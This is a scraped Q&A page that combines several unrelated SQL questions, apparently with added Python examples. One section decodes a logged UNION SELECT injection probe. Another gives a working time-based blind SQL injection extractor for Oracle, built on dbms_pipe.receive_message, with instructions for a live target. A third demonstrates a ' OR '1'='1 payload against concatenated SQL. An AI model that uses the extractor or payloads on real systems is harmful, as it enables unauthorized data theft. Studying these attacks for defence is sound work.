SQL Injection attempt, what does this query attempt to do? [duplicate] - sql

This question already has answers here:
Closed 11 years ago.
Possible Duplicate:
Site has been hacked via SQL Injection
Looks like one of my websites had a hack attempt on it; my reports showed the following query-string data was attempted:
QUERY_STRING = ID=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-
It failed because I always cast any integer parameter to an integer, so you get mismatch errors if anything like this is tried (classic ASP). But I'm confused about what the query above is attempting; it doesn't look like anything I've seen before.

Take a look at:
Site has been hacked via SQL Injection
At first look, I guess it was some automatic tool doing some blind SQL injection.
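As an added example (not part of either post above), the following Python decodes the logged query string and shows why the integer cast stops it. The hex literals are a MySQL idiom: MySQL evaluates `0x31303235343830303536` as the string it spells in ASCII, so selecting the same literal in every column marks which columns are echoed back to the page; `-999.9` is chosen so the original WHERE clause matches nothing, and the number of selected literals (20 here) is the column count the tool is currently guessing, since a UNION only succeeds when the counts match. The query string below is a constructed copy of the one in the post.

```python
import re
from urllib.parse import unquote

# Constructed copy of the logged value: 20 identical hex literals, as in the post.
HEX_LITERAL = "0x31303235343830303536"
QUERY_STRING = "ID=-999.9%20UNION%20ALL%20SELECT%20" + ",".join([HEX_LITERAL] * 20) + "-"


def decode_probe(query_string: str) -> dict:
    """URL-decode the ID value, pull out every 0x... literal and turn each one
    into the ASCII string MySQL would return for it."""
    value = query_string.split("=", 1)[1]
    decoded = unquote(value)
    literals = re.findall(r"0x([0-9a-fA-F]+)", decoded)
    markers = sorted({bytes.fromhex(h).decode("ascii") for h in literals})
    return {
        "decoded": decoded,          # the text that would be spliced into the SQL
        "column_count": len(literals),  # the tool's current guess at the column count
        "markers": markers,          # what each 0x literal selects as a string
    }


def render_unsafe_sql(id_value: str) -> str:
    """Hypothetical vulnerable query built by string concatenation (assumed table
    and column names, not from the post), to show what the server would parse."""
    return "SELECT * FROM products WHERE id=" + id_value


def safe_int_param(value: str) -> int:
    """The poster's defence, in Python: convert before use. Anything that is not a
    plain integer raises ValueError, so the UNION text never reaches the SQL."""
    return int(value)
```

Running `decode_probe(QUERY_STRING)` gives one marker string, `1025480056`, and a column count of 20; `safe_int_param` raises on the decoded value and only accepts a bare integer such as `42`. The trailing `-` is kept exactly as it was logged.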

Related

Oracle Sql - Time based sql injection

When trying to do an SQL injection on an Oracle SQL database I have the problem that most of the examples in the tutorials do not work. I already found out that I can only use CASE WHEN a THEN b ELSE c END instead of normal if statements.
The question I have now is how do I get a time delay into the injection? Benchmark() and sleep() do not work either.
I already know that the table is named "flag" and the field I want to read out is named "password".
The only information I get from the database is the time it needed to execute my input (or query, since I bypass the input to inject SQL).
I found the following SQL statement on the web at SQL Injection Tutorial
select dbms_pipe.receive_message(('a'),10) from dual;
I am not certain I should be participating in this sort of thing, but since I found it with my first Google Search, I will go ahead and post it.
I tested it and it delayed the result by 10 seconds.
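An added example, not from the question or answer above, of how the delay is actually used: it wraps `dbms_pipe.receive_message` in the CASE WHEN form the poster said works, and binary-searches each character of `flag.password` (table and column names from the question) by whether the response was delayed. The `ROWNUM = 1` subquery is an assumption that the table holds one row, and `timing_oracle` expects a caller-supplied function that sends SQL to the target; the test below uses a simulated oracle instead of a live database.

```python
import time

DELAY = 10  # seconds; the dbms_pipe.receive_message timeout from the post

PASSWORD_SUBQUERY = "(SELECT password FROM flag WHERE ROWNUM = 1)"  # assumption: one row


def make_length_payload(threshold: int, delay: int = DELAY) -> str:
    """Delay only if LENGTH(password) > threshold (Oracle syntax)."""
    return (
        f"SELECT CASE WHEN LENGTH({PASSWORD_SUBQUERY}) > {threshold} "
        f"THEN dbms_pipe.receive_message('a', {delay}) ELSE 0 END FROM dual"
    )


def make_char_payload(pos: int, threshold: int, delay: int = DELAY) -> str:
    """Delay only if the ASCII code of character `pos` (1-based) is > threshold."""
    return (
        f"SELECT CASE WHEN ASCII(SUBSTR({PASSWORD_SUBQUERY}, {pos}, 1)) > {threshold} "
        f"THEN dbms_pipe.receive_message('a', {delay}) ELSE 0 END FROM dual"
    )


def timing_oracle(send_query, delay: int = DELAY):
    """Turn a 'send this SQL to the target' function into two boolean predicates,
    answered purely from elapsed time (80% of the delay tolerates jitter)."""
    def ran_slow(sql: str) -> bool:
        start = time.monotonic()
        send_query(sql)
        return time.monotonic() - start >= delay * 0.8

    def is_longer(threshold):
        return ran_slow(make_length_payload(threshold, delay))

    def is_greater(pos, threshold):
        return ran_slow(make_char_payload(pos, threshold, delay))

    return is_longer, is_greater


def find_length(max_len: int, is_longer) -> int:
    """Binary search for LENGTH(password) in 0..max_len."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if is_longer(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(length: int, is_greater) -> str:
    """Binary search each character over printable ASCII 32..126: 7 queries per
    character instead of up to 95 with a linear scan."""
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if is_greater(pos, mid):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)
```

With a live target you would call `is_longer, is_greater = timing_oracle(send)` where `send` submits the payload through the injectable input, then `extract(find_length(64, is_longer), is_greater)`. Each true branch costs the full 10 seconds, so a shorter timeout than the tutorial's is usually worth it once you know the network jitter.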

How does separated clause and args protect against SQL injection? [duplicate]

This question already has answers here:
How can prepared statements protect from SQL injection attacks?
(10 answers)
Closed 8 years ago.
I heard that separating the SQL clause from the args can protect against SQL injection. For example,
clause = SELECT * WHERE ID = ? AND NAME = ?
with ID = 23, and NAME = "Tom".
Can someone explain to me how it works?
Basically, you're making the distinction between data and the actual code (the query part) very clear. You're telling the SQL server: this is clearly data and this is clearly code.
This way, you're basically skipping the part where the server has to pull apart the code and data from your query, so there's no chance the server can misinterpret bits of data as part of your query.
Edit: as per the link in the comments, this answer pretty much answers your question much better than I've explained here.

SQL Server Replace Command with Wildcard [duplicate]

This question already has answers here:
Perform regex (replace) in an SQL query
(5 answers)
Closed 5 years ago.
I am in need of some help. Thanks to fellow user davids, I was able to get certain things working within SQL Server and am in need of some more help. Here is what I am trying to do:
UPDATE Table1 SET keyfield=(REPLACE(REPLACE(Column1,'http://*/folder/',''),'.avi',''))
UPDATE Table2 SET keyfield=(REPLACE(REPLACE(Column2,'http://server2/folder/',''),'.mpg',''))
Can anyone help me out or point me in the right direction to get the wildcard to work? In this particular column, the * is an IP address and it will change all the time. Granted, I will know the IPs ahead of time and can probably do it one by one, but I would prefer to have it replaced automatically. Thanks in advance!
You should look into regular expressions.
My google karma found this article in MSDN Magazine.
Edit:
See also:
Perform regex (replace) in an SQL query
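An added example, not from the question or answer above, of the regex the answer points to, written in Python so it can be checked offline before being ported to whatever regex facility the SQL Server side ends up using. The pattern assumes the folder segment is literally `folder` and the host is anything up to the next slash (an IP address or a name such as `server2`), and it deliberately returns None for rows that do not match so a stray value is flagged rather than silently rewritten. The sample rows are constructed.

```python
import re

# Any host, the literal 'folder' segment, then a single file name with .avi or .mpg.
KEY_RE = re.compile(r"^http://[^/]+/folder/(?P<key>[^/]+)\.(?:avi|mpg)$", re.IGNORECASE)


def extract_key(url: str):
    """Return the key between the folder prefix and the extension, or None if the
    value does not have the expected shape (different folder, extra path parts, ...)."""
    m = KEY_RE.match(url.strip())
    return m.group("key") if m else None


def plan_updates(rows):
    """rows: (primary_key, column_value) pairs. Returns the (primary_key, keyfield)
    pairs that are safe to write and the primary keys that need a manual look."""
    updates, unmatched = [], []
    for pk, value in rows:
        key = extract_key(value)
        if key is None:
            unmatched.append(pk)
        else:
            updates.append((pk, key))
    return updates, unmatched


# Constructed sample data covering both tables' cases plus two rows that should not match.
SAMPLE_ROWS = [
    (1, "http://10.0.0.5/folder/clip01.avi"),
    (2, "http://192.168.1.20/folder/Clip02.AVI"),
    (3, "http://server2/folder/show.mpg"),
    (4, "http://10.0.0.5/other/clip01.avi"),
    (5, "http://10.0.0.5/folder/sub/clip01.avi"),
]
```

`plan_updates(SAMPLE_ROWS)` yields keys `clip01`, `Clip02` and `show` for rows 1 to 3 and reports rows 4 and 5 as unmatched, which is the behaviour you want before running the UPDATE over a whole table.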

What does a colon (':') mean in SQL syntax? [duplicate]

This question already has answers here:
Closed 10 years ago.
Possible Duplicate:
What does the colon sign “:” do in a SQL query?
Simple SQL question:
What does : stand for?
For example:
SELECT * FROM myTable
WHERE Employee_column = :P_EmplId;
The : isn't exactly easy to google when you don't know what this is called. Even searching here didn't help. I'm using Oracle 11g if that makes any difference.
It is a bind variable:
A placeholder in a SQL statement that must be replaced with a valid
value or value address for the statement to execute successfully. By
using bind variables, you can write a SQL statement that accepts
inputs or parameters at run time. The following example shows a query
that uses v_empid as a bind variable:
Most likely you took the query from a template. It is meant to be processed with PHP's MDB2 SQL framework. The ":" (colon) signals a placeholder in the statement, meant to be replaced when the query is executed.
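An added example, not from any of the posts, that serves both the question about separating the clause from the args (`SELECT * WHERE ID = ? AND NAME = ?` with ID = 23 and NAME = "Tom") and the question about the `:P_EmplId` bind variable: both are placeholders, and Python's sqlite3 module accepts both the `?` and the `:name` forms, so one in-memory database can show the difference between splicing input into the SQL text and passing it as a bound value. Table and rows are constructed for the example; sqlite3 stands in for the posters' databases.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table; the row (23, 'Tom') comes from the question."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE employees (id INTEGER, name TEXT)")
    con.executemany("INSERT INTO employees VALUES (?, ?)",
                    [(23, "Tom"), (24, "Ann"), (25, "Bob")])
    return con


def lookup_concat(con, emp_id, name):
    """Vulnerable: input is pasted into the SQL text, so the parser treats the
    attacker's quote and OR as part of the query."""
    sql = f"SELECT id, name FROM employees WHERE id = {emp_id} AND name = '{name}'"
    return con.execute(sql).fetchall()


def lookup_positional(con, emp_id, name):
    """Safe: '?' placeholders. The statement is parsed once, with two data slots;
    whatever arrives in `name` is compared as a string, never parsed."""
    return con.execute(
        "SELECT id, name FROM employees WHERE id = ? AND name = ?", (emp_id, name)
    ).fetchall()


def lookup_named(con, emp_id):
    """Same mechanism with an Oracle-style ':name' bind variable, which sqlite3
    also accepts; the value is supplied by name in a dict."""
    return con.execute(
        "SELECT id, name FROM employees WHERE id = :P_EmplId", {"P_EmplId": emp_id}
    ).fetchall()
```

With `name = "x' OR '1'='1"`, the concatenated query returns every row because the WHERE clause became `id = 23 AND name = 'x' OR '1'='1'`; the `?` version returns nothing, since no employee is literally named `x' OR '1'='1`. Likewise binding `"23 OR 1=1"` to `:P_EmplId` matches no row: it is compared as text against the integer column, not executed as SQL.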

Should we end the statement in T-SQL with semi-colon? [duplicate]

This question already has answers here:
Closed 12 years ago.
Possible Duplicate:
When should I use semicolons in SQL Server?
When we are writing a SQL script in T-SQL, should we end each statement with a semi-colon? Does semi-colon work like 'GO' keyword? As of now, I see that it doesn't really matter, but I would like to know which is the best practice?
It's good to get into the habit now because CTE/WITH and MERGE need it, as well as some Service broker stuff as mentioned in the other question. Of course, you could use ;WITH cTE AS ...
C# etc monkeys have been doing it for years.
It won't work with GO because it isn't a keyword. It's a directive for SSMS and other tools to break a larger script into batches.